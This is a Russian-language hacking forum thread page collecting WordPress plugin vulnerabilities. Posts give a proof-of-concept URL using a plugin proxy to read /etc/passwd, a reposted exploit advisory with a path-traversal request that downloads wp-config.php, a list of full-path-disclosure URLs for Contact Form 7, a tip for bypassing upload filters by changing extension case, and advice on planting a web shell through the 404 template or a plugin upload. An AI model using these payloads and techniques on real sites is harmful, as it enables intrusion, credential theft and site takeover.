HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #331  
Старый 21.06.2015, 17:47
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

смотрите в сторону функций
http://php.net/manual/ru/function.strpos.php и http://php.net/manual/ru/function.stripos.php
я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?
 
Ответить с цитированием

  #332  
Старый 21.06.2015, 22:49
avin
Guest
Сообщений: n/a
Провел на форуме:
35906

Репутация: 2
По умолчанию

Цитата:
Сообщение от blackbox  
blackbox said:

я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?
да, пройдет
 
Ответить с цитированием

  #333  
Старый 10.07.2015, 10:16
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

WP 3D Twitter Wall

Код:
Code:
# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
#/wp-content/plugins/3d-twitter-wall/proxy.php

$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url);    // $url = $_GET['url'] OR $_POST['url']
...
$response = curl_exec($session);
echo $response;
curl_close($session);
POC: _http://example.com/plugins/3d-twitte...:///etc/passwd
 
Ответить с цитированием

  #334  
Старый 14.07.2015, 12:48
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]

Код:
Code:
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5  [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.

====================
DESCRIPTION
====================

A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.

The web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
in application compromise.

==============
POC
==============

   # http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
  
   the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.

  
==================
VULNERABLE CODE
==================

Located in cp-image-store.php

function cpis_download_file(){
    ...
       
    if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
        header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
        header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
        if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
            readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
        }else{
            @unlink( CPIS_DOWNLOAD.'/.htaccess');
            header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
        }
    ...
}
 
Ответить с цитированием

  #335  
Старый 03.08.2015, 12:17
PoizOn
Новичок
Регистрация: 06.06.2006
Сообщений: 2
Провел на форуме:
5792

Репутация: 3
По умолчанию

Вот интересная бага:

http://seclists.org/fulldisclosure/2015/Feb/75

Но я до чего-то вразумительтного ее не докрутил

admin.php?page=wc-reports&";>

admin.php?page=wc-reports&";>WOW
 
Ответить с цитированием

  #337  
Старый 04.02.2016, 17:44
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

Contact form 7


Full Path Disclosure

wp-content/plugins/contact-form-7/includes/upgrade.php

/wp-content/plugins/contact-form-7/modules/acceptance.php

/wp-content/plugins/contact-form-7/modules/akismet.php

/wp-content/plugins/contact-form-7/modules/checkbox.php

/wp-content/plugins/contact-form-7/modules/count.php

/wp-content/plugins/contact-form-7/modules/date.php

/wp-content/plugins/contact-form-7/modules/file.php

/wp-content/plugins/contact-form-7/modules/flamingo.php

/wp-content/plugins/contact-form-7/modules/jetpack.php

/wp-content/plugins/contact-form-7/modules/listo.php

/wp-content/plugins/contact-form-7/modules/number.php

/wp-content/plugins/contact-form-7/modules/quiz.php

/wp-content/plugins/contact-form-7/modules/really-simple-captcha.php

/wp-content/plugins/contact-form-7/modules/recaptcha.php

/wp-content/plugins/contact-form-7/modules/response.php

/wp-content/plugins/contact-form-7/modules/select.php

/wp-content/plugins/contact-form-7/modules/submit.php

/wp-content/plugins/contact-form-7/modules/text.php

/wp-content/plugins/contact-form-7/modules/textarea.php
 
Ответить с цитированием

  #338  
Старый 08.03.2016, 13:31
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

https://github.com/rastating/wordpre...loit-framework

Ruby фреймворк для эскплутации и тестирования WP

статья на английском

http://www.kitploit.com/2016/03/word...work-ruby.html
 
Ответить с цитированием

  #339  
Старый 20.04.2016, 14:17
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

какие методы есть заливки шелла в wp?
 
Ответить с цитированием

  #340  
Старый 20.04.2016, 15:52
powerOfthemind
Guest
Сообщений: n/a
Провел на форуме:
9212

Репутация: 1
По умолчанию

Цитата:
Сообщение от R3hab  
R3hab said:

какие методы есть заливки шелла в wp?
Смотря какие у тебя права в админк, если можешь редактировать шаблон то в страницу 404 пихаешь код шела и радуешься или через загрузку плагина, пакуешь в архив шел и льеш на сайт.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ